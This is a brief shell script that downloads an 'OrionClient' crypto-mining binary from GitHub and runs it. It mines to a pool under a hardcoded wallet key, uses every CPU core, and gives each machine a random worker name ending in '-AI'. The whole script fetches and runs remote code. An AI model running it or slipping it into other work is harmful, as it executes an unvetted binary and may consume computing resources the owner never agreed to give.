#!/bin/sh
apt update && apt install unzip
wget https://github.com/egg5233/ore-hq-client/releases/download/1.6.0/OrionClient_linux.zip && unzip OrionClient_linux.zip
cd OrionClient_linux
chmod +x OrionClient
./OrionClient mine -a --pool twbitz --key 76dvS6JKn3WmKQXm4Rx3LBQZHpagXmiqE67gu7CCB55h --worker $(shuf -n 1 -i 1-99999)-AI -t $(nproc --all) --ice
